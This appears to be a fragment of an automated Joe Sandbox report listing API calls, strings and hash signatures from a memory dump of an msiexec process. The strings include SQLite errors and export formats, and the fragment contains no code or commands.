                                                                                                                                                      • <%s>, xrefs: 004100A6
                                                                                                                                                      • <?xml version="1.0" ?>, xrefs: 0041007C
                                                                                                                                                      • <?xml version="1.0" encoding="ISO-8859-1" ?>, xrefs: 00410083
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 0000000D.00000002.2427620817.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                      • Snapshot File: hcaresult_13_2_400000_msiexec.jbxd
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: memset$_snwprintf
                                                                                                                                                      • String ID: <%s>$<?xml version="1.0" ?>$<?xml version="1.0" encoding="ISO-8859-1" ?>
                                                                                                                                                      • API String ID: 3473751417-2880344631
                                                                                                                                                      • Opcode ID: 8f05c840c11c4290d444f2162549af975e664009f5abef6099482a1c5cfc950c
                                                                                                                                                      • Instruction ID: 2862698e7f89dc449948c814091faf4507903f68b21858a7dbdf66e33a92e1a6
                                                                                                                                                      • Opcode Fuzzy Hash: 8f05c840c11c4290d444f2162549af975e664009f5abef6099482a1c5cfc950c
                                                                                                                                                      • Instruction Fuzzy Hash: F501C8F2E402197BD720AA559C41FEAB6ACEF48345F0040B7B608B3151D6389F494B99
                                                                                                                                                      APIs
                                                                                                                                                      Strings
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 0000000D.00000002.2427620817.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                      • Snapshot File: hcaresult_13_2_400000_msiexec.jbxd
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: wcscat$_snwprintfmemset
                                                                                                                                                      • String ID: %2.2X
                                                                                                                                                      • API String ID: 2521778956-791839006
                                                                                                                                                      • Opcode ID: fbe0b2ef567fee9eabd5ce406f53818797bf0b783fcface126c98386edfee971
                                                                                                                                                      • Instruction ID: 672bbb69153a15f1984629f72f86def8939f314c78adde6f8276b735d3b02408
                                                                                                                                                      • Opcode Fuzzy Hash: fbe0b2ef567fee9eabd5ce406f53818797bf0b783fcface126c98386edfee971
                                                                                                                                                      • Instruction Fuzzy Hash: 2101D472A403297AF7206756AC46BBA33ACAB41714F11407BFC14AA1C2EA7C9A54469A
                                                                                                                                                      APIs
                                                                                                                                                      Strings
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 0000000D.00000002.2427620817.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                      • Snapshot File: hcaresult_13_2_400000_msiexec.jbxd
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: _snwprintfwcscpy
                                                                                                                                                      • String ID: dialog_%d$general$menu_%d$strings
                                                                                                                                                      • API String ID: 999028693-502967061
                                                                                                                                                      • Opcode ID: 17378f80787d8f3ebe1be11f22ab444215ff95c87d82bd16ffe54226d060cac5
                                                                                                                                                      • Instruction ID: 4b5f4d23dee208ad245a1fa3262b8d520e9fbefe09054bf07968a47f6ed58b46
                                                                                                                                                      • Opcode Fuzzy Hash: 17378f80787d8f3ebe1be11f22ab444215ff95c87d82bd16ffe54226d060cac5
                                                                                                                                                      • Instruction Fuzzy Hash: 1AE04FB5E8870035E92519A10C03B2A155086A6B5BF740C2BFD0AB11D2E47F955DA40F
                                                                                                                                                      APIs
                                                                                                                                                      • strlen.MSVCRT ref: 00408DFA
                                                                                                                                                        • Part of subcall function 00408D18: memcpy.MSVCRT(?,?,00000008,00000008,00000010,00000040,?,?), ref: 00408D44
                                                                                                                                                      • memset.MSVCRT ref: 00408E46
                                                                                                                                                      • memcpy.MSVCRT(00000000,?,?,00000000,00000000,00000000), ref: 00408E59
                                                                                                                                                      • memcpy.MSVCRT(?,?,?,?,?,?,00000000,00000000,00000000), ref: 00408E6C
                                                                                                                                                      • memcpy.MSVCRT(00000000,00000000,00000014,?,00000000,?,?,00000000,?,00000000,00000000,?,00000000), ref: 00408EB2
                                                                                                                                                      • memcpy.MSVCRT(?,?,?,00000000,?,00000000,?,?,?,?,?,?,00000000,00000000,00000000), ref: 00408EC5
                                                                                                                                                      • memcpy.MSVCRT(00000000,00000000,00000014,?,00000000,00000000,00000060,00000000,?,?,?,00000000,?,00000000), ref: 00408EF2
                                                                                                                                                      • memcpy.MSVCRT(?,00000000,00000014,00000000,00000060,00000000,?,?,?,00000000,?,00000000), ref: 00408F07
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 0000000D.00000002.2427620817.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                      • Snapshot File: hcaresult_13_2_400000_msiexec.jbxd
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: memcpy$memsetstrlen
                                                                                                                                                      • String ID:
                                                                                                                                                      • API String ID: 2350177629-0
                                                                                                                                                      • Opcode ID: b0fd6244f294145fe9a6ea4e3d429f9bbf97f6839acfbc1745acf2347c5e71ea
                                                                                                                                                      • Instruction ID: 5f65aa9fdfa02acdbc3988aed820739efb0bf546d233f5e01752542f466a415e
                                                                                                                                                      • Opcode Fuzzy Hash: b0fd6244f294145fe9a6ea4e3d429f9bbf97f6839acfbc1745acf2347c5e71ea
                                                                                                                                                      • Instruction Fuzzy Hash: 3951017290050DBEEB51DAE8CC45FEFBBBCAB09304F004476F709E6155E6349B498BA6
                                                                                                                                                      APIs
                                                                                                                                                      Strings
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 0000000D.00000002.2427620817.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                      • Snapshot File: hcaresult_13_2_400000_msiexec.jbxd
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: memset
                                                                                                                                                      • String ID: 8$GROUP$ORDER$a GROUP BY clause is required before HAVING$aggregate functions are not allowed in the GROUP BY clause
                                                                                                                                                      • API String ID: 2221118986-1606337402
                                                                                                                                                      • Opcode ID: 10415b1a1c8003ecd0031fb780f2e77066144490245ccd4b04bba77302a40a65
                                                                                                                                                      • Instruction ID: 7aef5b05df8cb417835a49add62511a3dd126d480fa81acd131143259a3eb597
                                                                                                                                                      • Opcode Fuzzy Hash: 10415b1a1c8003ecd0031fb780f2e77066144490245ccd4b04bba77302a40a65
                                                                                                                                                      • Instruction Fuzzy Hash: 5D818A706083219FDB10CF25E48162BB7E1EF84318F96885EEC949B256D738EC55CB9B
                                                                                                                                                      APIs
                                                                                                                                                      • _mbscpy.MSVCRT(?,00000000,00000000,?,00000001), ref: 00408F50
                                                                                                                                                      • memcmp.MSVCRT(?,?,00000010,0040951D,?,?,?,?,00000010,?,00000000,?,00000001), ref: 00408FB3
                                                                                                                                                      • memset.MSVCRT ref: 00408FD4
                                                                                                                                                      • memcmp.MSVCRT(?,?,00000010,0040951D,?,?,00000010,?,00000000,?,00000001), ref: 00409025
                                                                                                                                                      • memset.MSVCRT ref: 00409042
                                                                                                                                                      • memcpy.MSVCRT(?,?,00000018,00000001,?,?,00000020,?,?,?,?,00000000,?,00000001), ref: 00409079
                                                                                                                                                        • Part of subcall function 00408C3C: strlen.MSVCRT ref: 00408C96
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 0000000D.00000002.2427620817.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                      • Snapshot File: hcaresult_13_2_400000_msiexec.jbxd
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: memcmpmemset$_mbscpymemcpystrlen
                                                                                                                                                      • String ID:
                                                                                                                                                      • API String ID: 265355444-0
                                                                                                                                                      • Opcode ID: a83a1467d2796da51f33b336eeec327ded5aa3ca15fd709dc7ec48effe5a66b1
                                                                                                                                                      • Instruction ID: d0ac777748d33e6673793c59e161d6f76d61048b6b1b65ce46f59eb5e56095ce
                                                                                                                                                      • Opcode Fuzzy Hash: a83a1467d2796da51f33b336eeec327ded5aa3ca15fd709dc7ec48effe5a66b1
                                                                                                                                                      • Instruction Fuzzy Hash: E241677190060CBEEB21DAA0DC45FDFB7BCAF04344F00443EF655E6182E675AA498BA5
                                                                                                                                                      APIs
                                                                                                                                                      • memset.MSVCRT ref: 004116FF
                                                                                                                                                        • Part of subcall function 0040D134: GetModuleHandleW.KERNEL32(00000000,?,?,00402E6F), ref: 0040D173
                                                                                                                                                        • Part of subcall function 0040D134: LoadStringW.USER32(00000000,?,?), ref: 0040D20C
                                                                                                                                                        • Part of subcall function 0040D134: memcpy.MSVCRT(00000000,00000002,?,?,00402E6F), ref: 0040D24C
                                                                                                                                                        • Part of subcall function 0040D134: wcscpy.MSVCRT ref: 0040D1B5
                                                                                                                                                        • Part of subcall function 0040D134: wcslen.MSVCRT ref: 0040D1D3
                                                                                                                                                        • Part of subcall function 0040D134: GetModuleHandleW.KERNEL32(00000000), ref: 0040D1E1
                                                                                                                                                        • Part of subcall function 0040A45A: memset.MSVCRT ref: 0040A47B
                                                                                                                                                        • Part of subcall function 0040A45A: _snwprintf.MSVCRT ref: 0040A4AE
                                                                                                                                                        • Part of subcall function 0040A45A: wcslen.MSVCRT ref: 0040A4BA
                                                                                                                                                        • Part of subcall function 0040A45A: memcpy.MSVCRT(?,?,?,?,?,00000400,%s (%s),?,?), ref: 0040A4D2
                                                                                                                                                        • Part of subcall function 0040A45A: wcslen.MSVCRT ref: 0040A4E0
                                                                                                                                                        • Part of subcall function 0040A45A: memcpy.MSVCRT(?,?,?,?,?,?,?,?,?,00000400,%s (%s),?,?), ref: 0040A4F3
                                                                                                                                                        • Part of subcall function 0040A279: wcscpy.MSVCRT ref: 0040A2DF
                                                                                                                                                      Strings
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 0000000D.00000002.2427620817.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                      • Snapshot File: hcaresult_13_2_400000_msiexec.jbxd
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: memcpywcslen$HandleModulememsetwcscpy$LoadString_snwprintf
                                                                                                                                                      • String ID: *.csv$*.htm;*.html$*.txt$*.xml$txt
                                                                                                                                                      • API String ID: 2618321458-3614832568
                                                                                                                                                      • Opcode ID: 892276959a0c47848777e093024f27755814d5c903fce7db561a0975b0ee82c0
                                                                                                                                                      • Instruction ID: 2af34abd3473d77be096866f654b5876edf67c2d942e61680e34910f62553c8c
                                                                                                                                                      • Opcode Fuzzy Hash: 892276959a0c47848777e093024f27755814d5c903fce7db561a0975b0ee82c0
                                                                                                                                                      • Instruction Fuzzy Hash: 71310DB1D013589BDB10EFA9DC816DDBBB4FB08345F10407BE548BB282DB385A468F99
                                                                                                                                                      APIs
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 0000000D.00000002.2427620817.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                      • Snapshot File: hcaresult_13_2_400000_msiexec.jbxd
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: AttributesFilefreememset
                                                                                                                                                      • String ID:
                                                                                                                                                      • API String ID: 2507021081-0
                                                                                                                                                      • Opcode ID: afcad17dad9998b86119828d1b617f81507b1c6ffb5a90d063004130875e5eff
                                                                                                                                                      • Instruction ID: e31a4ad29e7632976921f0390f19c15604a95804a640e9d04457ce0419b5f72c
                                                                                                                                                      • Opcode Fuzzy Hash: afcad17dad9998b86119828d1b617f81507b1c6ffb5a90d063004130875e5eff
                                                                                                                                                      • Instruction Fuzzy Hash: 1211E632A04115EFDB209FA49DC59FF73A8EB45318B21013FF911E2280DF789D8196AE
                                                                                                                                                      APIs
                                                                                                                                                      • AreFileApisANSI.KERNEL32 ref: 004174FC
                                                                                                                                                      • MultiByteToWideChar.KERNEL32(00000001,00000000,?,000000FF,00000000,00000000), ref: 0041751A
                                                                                                                                                      • malloc.MSVCRT ref: 00417524
                                                                                                                                                      • MultiByteToWideChar.KERNEL32(00000001,00000000,?,000000FF,00000000,00000000), ref: 0041753B
                                                                                                                                                      • free.MSVCRT ref: 00417544
                                                                                                                                                      • free.MSVCRT ref: 00417562
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 0000000D.00000002.2427620817.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                      • Snapshot File: hcaresult_13_2_400000_msiexec.jbxd
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: ByteCharMultiWidefree$ApisFilemalloc
                                                                                                                                                      • String ID:
                                                                                                                                                      • API String ID: 4131324427-0
                                                                                                                                                      • Opcode ID: 5d21432bc65b929392c7d49bf17a02b877e07d349bc8417fbf8b7ee350a515ff
                                                                                                                                                      • Instruction ID: 8d188238c5fd2fb6163cec5331830b967abe0ebba74b79ef9884251e0929a2bc
                                                                                                                                                      • Opcode Fuzzy Hash: 5d21432bc65b929392c7d49bf17a02b877e07d349bc8417fbf8b7ee350a515ff
                                                                                                                                                      • Instruction Fuzzy Hash: 9701D4726081257BEB215B7A9C41DEF3AAEDF463B47210226FC14E3280EA38DD4141BD
                                                                                                                                                      APIs
                                                                                                                                                      • GetTempPathW.KERNEL32(000000E6,?,?,00417D63), ref: 004181DB
                                                                                                                                                      • GetTempPathA.KERNEL32(000000E6,?,?,00417D63), ref: 00418203
                                                                                                                                                      • free.MSVCRT ref: 0041822B
                                                                                                                                                      Strings
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 0000000D.00000002.2427620817.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                      • Snapshot File: hcaresult_13_2_400000_msiexec.jbxd
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: PathTemp$free
                                                                                                                                                      • String ID: %s\etilqs_$etilqs_
                                                                                                                                                      • API String ID: 924794160-1420421710
                                                                                                                                                      • Opcode ID: 15bc68a9d504a75b2650ebb6305fe60db7282026434a3c37ef8699a19a7f4611
                                                                                                                                                      • Instruction ID: b359b55a6514fc6c55a0405950767d5f88b37029f74eadb26d8a0dc7501745d5
                                                                                                                                                      • Opcode Fuzzy Hash: 15bc68a9d504a75b2650ebb6305fe60db7282026434a3c37ef8699a19a7f4611
                                                                                                                                                      • Instruction Fuzzy Hash: 43313931A046169BE725A3669C41BFB735C9B64308F2004AFE881C2283EF7CDEC54A5D
                                                                                                                                                      APIs
                                                                                                                                                      • memset.MSVCRT ref: 0040FDD5
                                                                                                                                                        • Part of subcall function 00414E7F: memcpy.MSVCRT(004032AD,&lt;,00000008,?,?,00000000,0040FDF6,?,?,?,<item>), ref: 00414EFC
                                                                                                                                                        • Part of subcall function 0040F5BE: wcscpy.MSVCRT ref: 0040F5C3
                                                                                                                                                        • Part of subcall function 0040F5BE: _wcslwr.MSVCRT ref: 0040F5FE
                                                                                                                                                      • _snwprintf.MSVCRT ref: 0040FE1F
                                                                                                                                                      Strings
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 0000000D.00000002.2427620817.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                      • Snapshot File: hcaresult_13_2_400000_msiexec.jbxd
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: _snwprintf_wcslwrmemcpymemsetwcscpy
                                                                                                                                                      • String ID: <%s>%s</%s>$</item>$<item>
                                                                                                                                                      • API String ID: 1775345501-2769808009
                                                                                                                                                      • Opcode ID: 3766bef419d6113f501c5e442c1acc564cf9e92440af78075bbd4ce4ba4e02a5
                                                                                                                                                      • Instruction ID: 102da8641e186e10bf8cf1b41b05db2e7c44eca872c9cddb12e5aab4d34b3b7e
                                                                                                                                                      • Opcode Fuzzy Hash: 3766bef419d6113f501c5e442c1acc564cf9e92440af78075bbd4ce4ba4e02a5
                                                                                                                                                      • Instruction Fuzzy Hash: 3111C131600219BBDB21AF65CC86E99BB65FF04348F00007AFD05676A2C779E968CBC9
                                                                                                                                                      APIs
                                                                                                                                                      Strings
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 0000000D.00000002.2427620817.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                      • Snapshot File: hcaresult_13_2_400000_msiexec.jbxd
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: ErrorLastMessage_snwprintf
                                                                                                                                                      • String ID: Error$Error %d: %s
                                                                                                                                                      • API String ID: 313946961-1552265934
                                                                                                                                                      • Opcode ID: a33dc607cfdbe5323d0e9dcae57c7c504b94496520966edc9fba833a94f57729
                                                                                                                                                      • Instruction ID: 46023337ddced075b6ccb796d059e6b1f6412beb8ed51135551ede388a9512b7
                                                                                                                                                      • Opcode Fuzzy Hash: a33dc607cfdbe5323d0e9dcae57c7c504b94496520966edc9fba833a94f57729
                                                                                                                                                      • Instruction Fuzzy Hash: C1F0A7765402086BDB11A795DC06FDA73BCFB45785F0404ABB544A3181DAB4EA484A59
                                                                                                                                                      Strings
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 0000000D.00000002.2427620817.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                      • Snapshot File: hcaresult_13_2_400000_msiexec.jbxd
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID:
                                                                                                                                                      • String ID: foreign key constraint failed$new$oid$old
                                                                                                                                                      • API String ID: 0-1953309616
                                                                                                                                                      • Opcode ID: 069b176ce5c0b1780be5899369789ed0400efb36521cc305734fd4b3024b452b
                                                                                                                                                      • Instruction ID: 109d2bbf80905f1e2503505ff3b1f335ff26ebd6ff49ac5ca42eb4ed0232da3f
                                                                                                                                                      • Opcode Fuzzy Hash: 069b176ce5c0b1780be5899369789ed0400efb36521cc305734fd4b3024b452b
                                                                                                                                                      • Instruction Fuzzy Hash: 71E19271E00318EFDF14DFA5D882AAEBBB5EF08304F54406EE805AB351DB799A01CB65
                                                                                                                                                      APIs
                                                                                                                                                      Strings
                                                                                                                                                      • unknown column "%s" in foreign key definition, xrefs: 00431858
                                                                                                                                                      • foreign key on %s should reference only one column of table %T, xrefs: 004316CD
                                                                                                                                                      • number of columns in foreign key does not match the number of columns in the referenced table, xrefs: 004316F5
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 0000000D.00000002.2427620817.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                      • Snapshot File: hcaresult_13_2_400000_msiexec.jbxd
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: memcpy
                                                                                                                                                      • String ID: foreign key on %s should reference only one column of table %T$number of columns in foreign key does not match the number of columns in the referenced table$unknown column "%s" in foreign key definition
                                                                                                                                                      • API String ID: 3510742995-272990098
                                                                                                                                                      • Opcode ID: e905bcb7075b3ffde12d97cbb86947b7ecee93158e4b53cf1fdf11e57d7b5828
                                                                                                                                                      • Instruction ID: d29657cdd308451ad819b70b0710bc7d1770ace047979dc07f2e4ef1020519d4
                                                                                                                                                      • Opcode Fuzzy Hash: e905bcb7075b3ffde12d97cbb86947b7ecee93158e4b53cf1fdf11e57d7b5828
                                                                                                                                                      • Instruction Fuzzy Hash: B7913E75A00205DFCB14DF99C481AAEBBF1FF49314F25815AE805AB312DB35E941CF99
                                                                                                                                                      APIs
                                                                                                                                                        • Part of subcall function 0040B1AB: free.MSVCRT ref: 0040B1AE
                                                                                                                                                        • Part of subcall function 0040B1AB: free.MSVCRT ref: 0040B1B6
                                                                                                                                                        • Part of subcall function 0040A9CE: free.MSVCRT ref: 0040A9DD
                                                                                                                                                      • memset.MSVCRT ref: 0040C439
                                                                                                                                                      • RegEnumValueW.ADVAPI32(?,00000000,?,000000FF,00000000,?,00000000,?,?,?,?,?,00000000,?), ref: 0040C467
                                                                                                                                                      • _wcsupr.MSVCRT ref: 0040C481
                                                                                                                                                        • Part of subcall function 0040A8D0: wcslen.MSVCRT ref: 0040A8E2
                                                                                                                                                        • Part of subcall function 0040A8D0: free.MSVCRT ref: 0040A908
                                                                                                                                                        • Part of subcall function 0040A8D0: free.MSVCRT ref: 0040A92B
                                                                                                                                                        • Part of subcall function 0040A8D0: memcpy.MSVCRT(?,?,000000FF,00000000,?,?,00000000,?,0040320A,00000000,000000FF), ref: 0040A94F
                                                                                                                                                      • memset.MSVCRT ref: 0040C4D0
                                                                                                                                                      • RegEnumValueW.ADVAPI32(?,00000000,?,000000FF,00000000,?,00000000,?,?,?,000000FF,?,?,?,?,00000000), ref: 0040C4FB
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 0000000D.00000002.2427620817.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                      • Snapshot File: hcaresult_13_2_400000_msiexec.jbxd
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: free$EnumValuememset$_wcsuprmemcpywcslen
                                                                                                                                                      • String ID:
                                                                                                                                                      • API String ID: 1265369119-0
                                                                                                                                                      • Opcode ID: 7b1cc3e9e28870269e7e0e76d5f0a110d3188fcb9cf6d5cab2ec752ccc6f38bd
                                                                                                                                                      • Instruction ID: d2440758a7fd93b52fc88bd6111275bc9aa4df1ffeb01c53d5483546710cd2f3
                                                                                                                                                      • Opcode Fuzzy Hash: 7b1cc3e9e28870269e7e0e76d5f0a110d3188fcb9cf6d5cab2ec752ccc6f38bd
                                                                                                                                                      • Instruction Fuzzy Hash: A4411CB2900219BBDB00EF95DC85EEFB7BCAF48304F10417AB505F6191D7749A44CBA5
                                                                                                                                                      APIs
                                                                                                                                                      • memset.MSVCRT ref: 0044A6EB
                                                                                                                                                      • memset.MSVCRT ref: 0044A6FB
                                                                                                                                                      • memcpy.MSVCRT(?,?,?,00000000,?,?,00000000,?,?,00000000), ref: 0044A75D
                                                                                                                                                      • memcpy.MSVCRT(?,?,?,?,?,00000000,?,?,00000000), ref: 0044A7AA
                                                                                                                                                      Strings
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 0000000D.00000002.2427620817.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                      • Snapshot File: hcaresult_13_2_400000_msiexec.jbxd
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: memcpymemset
                                                                                                                                                      • String ID: gj
                                                                                                                                                      • API String ID: 1297977491-4203073231
                                                                                                                                                      • Opcode ID: 33c29578f6527905f4abec1227faf2173c8a70e2811538addd66a8855e8dc5c8
                                                                                                                                                      • Instruction ID: b45f8a370873a883e9703370fbfe8b0477d3556cf02d11e6db591a78d085f858
                                                                                                                                                      • Opcode Fuzzy Hash: 33c29578f6527905f4abec1227faf2173c8a70e2811538addd66a8855e8dc5c8
                                                                                                                                                      • Instruction Fuzzy Hash: 95213DB67403002BE7209A39CC4165B7B6D9FC6318F0A481EF6464B346E67DD605C756
                                                                                                                                                      APIs
                                                                                                                                                        • Part of subcall function 0040E8E0: ??3@YAXPAX@Z.MSVCRT(?,?,?,0040EB18), ref: 0040E8EC
                                                                                                                                                        • Part of subcall function 0040E8E0: ??3@YAXPAX@Z.MSVCRT(?,?,?,0040EB18), ref: 0040E8FA
                                                                                                                                                        • Part of subcall function 0040E8E0: ??3@YAXPAX@Z.MSVCRT(?,?,?,0040EB18), ref: 0040E90B
                                                                                                                                                        • Part of subcall function 0040E8E0: ??3@YAXPAX@Z.MSVCRT(?,?,?,0040EB18), ref: 0040E922
                                                                                                                                                        • Part of subcall function 0040E8E0: ??3@YAXPAX@Z.MSVCRT(?,?,?,0040EB18), ref: 0040E92B
                                                                                                                                                      • ??3@YAXPAX@Z.MSVCRT(?,?,00411CA8,00000000,?,00412766,00000000,00000000), ref: 0040E961
                                                                                                                                                      • ??3@YAXPAX@Z.MSVCRT(?,?,00411CA8,00000000,?,00412766,00000000,00000000), ref: 0040E974
                                                                                                                                                      • ??3@YAXPAX@Z.MSVCRT(00000001,?,00411CA8,00000000,?,00412766,00000000,00000000), ref: 0040E987
                                                                                                                                                      • ??3@YAXPAX@Z.MSVCRT(?,?,00411CA8,00000000,?,00412766,00000000,00000000), ref: 0040E99A
                                                                                                                                                      • free.MSVCRT ref: 0040E9D3
                                                                                                                                                        • Part of subcall function 0040AA04: free.MSVCRT ref: 0040AA0B
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 0000000D.00000002.2427620817.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                      • Snapshot File: hcaresult_13_2_400000_msiexec.jbxd
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: ??3@$free
                                                                                                                                                      • String ID:
                                                                                                                                                      • API String ID: 2241099983-0
                                                                                                                                                      • Opcode ID: 2f3d1febb6567f1c65e15d924abe411323abe179da33a997404dc77986320892
                                                                                                                                                      • Instruction ID: 098569c1990a85f87ddbd530571c52e66e2f7ba0f471894b996c1416d461d1fd
                                                                                                                                                      • Opcode Fuzzy Hash: 2f3d1febb6567f1c65e15d924abe411323abe179da33a997404dc77986320892
                                                                                                                                                      • Instruction Fuzzy Hash: 5001A932A01A2097C665BB27A50195EB354BE86B24316896FF844773C1CB3C6C61C6DF
                                                                                                                                                      APIs
                                                                                                                                                      • AreFileApisANSI.KERNEL32 ref: 00417497
                                                                                                                                                      • WideCharToMultiByte.KERNEL32(00000001,00000000,?,000000FF,00000000,00000000,00000000,00000000), ref: 004174B7
                                                                                                                                                      • malloc.MSVCRT ref: 004174BD
                                                                                                                                                      • WideCharToMultiByte.KERNEL32(00000001,00000000,?,000000FF,00000000,?,00000000,00000000), ref: 004174DB
                                                                                                                                                      • free.MSVCRT ref: 004174E4
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 0000000D.00000002.2427620817.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                      • Snapshot File: hcaresult_13_2_400000_msiexec.jbxd
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: ByteCharMultiWide$ApisFilefreemalloc
                                                                                                                                                      • String ID:
                                                                                                                                                      • API String ID: 4053608372-0
                                                                                                                                                      • Opcode ID: 26b6d0d827bb447631a2da2f7ad9fad7d37cc7249bf214c4621a9d0d58d44de2
                                                                                                                                                      • Instruction ID: 68224c9aa4b31b20fa5037399352f9c2f04b40a845063e8f60522cdb36b448b3
                                                                                                                                                      • Opcode Fuzzy Hash: 26b6d0d827bb447631a2da2f7ad9fad7d37cc7249bf214c4621a9d0d58d44de2
                                                                                                                                                      • Instruction Fuzzy Hash: DE01A4B150412DBEAF115FA99C80CAF7E7CEA463FC721422AF514E2290DA345E405AB9
                                                                                                                                                      APIs
                                                                                                                                                      • GetParent.USER32(?), ref: 0040D453
                                                                                                                                                      • GetWindowRect.USER32(?,?), ref: 0040D460
                                                                                                                                                      • GetClientRect.USER32(00000000,?), ref: 0040D46B
                                                                                                                                                      • MapWindowPoints.USER32(00000000,00000000,?,00000002), ref: 0040D47B
                                                                                                                                                      • SetWindowPos.USER32(?,00000000,?,00000001,00000000,00000000,00000005), ref: 0040D497
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 0000000D.00000002.2427620817.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                      • Snapshot File: hcaresult_13_2_400000_msiexec.jbxd
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: Window$Rect$ClientParentPoints
                                                                                                                                                      • String ID:
                                                                                                                                                      • API String ID: 4247780290-0
                                                                                                                                                      • Opcode ID: 51bf500d43eb7ed80d01eeab879738f26fa22579f9dd5d7918c8ee0e3f904b1b
                                                                                                                                                      • Instruction ID: 8744084584fea1eb3916f9079d499296a2dd08f7759f51c0708cf8f54c9212ed
                                                                                                                                                      • Opcode Fuzzy Hash: 51bf500d43eb7ed80d01eeab879738f26fa22579f9dd5d7918c8ee0e3f904b1b
                                                                                                                                                      • Instruction Fuzzy Hash: 62018836801129BBDB11EBA6CC49EFFBFBCFF06310F048069F901A2180D778A5018BA5
                                                                                                                                                      APIs
                                                                                                                                                        • Part of subcall function 004096C3: CreateFileW.KERNELBASE(00000000,80000000,00000003,00000000,00000003,00000000,00000000,0044509F,00000000,?,00000000,00000104,00445E7E,?,?), ref: 004096D5
                                                                                                                                                      • GetFileSize.KERNEL32(00000000,00000000,?,00000000,00000104,00445E7E,?,?,?,?,00000104), ref: 004450AA
                                                                                                                                                      • ??2@YAPAXI@Z.MSVCRT(0000000A,?,?,00000104), ref: 004450BE
                                                                                                                                                      • memset.MSVCRT ref: 004450CD
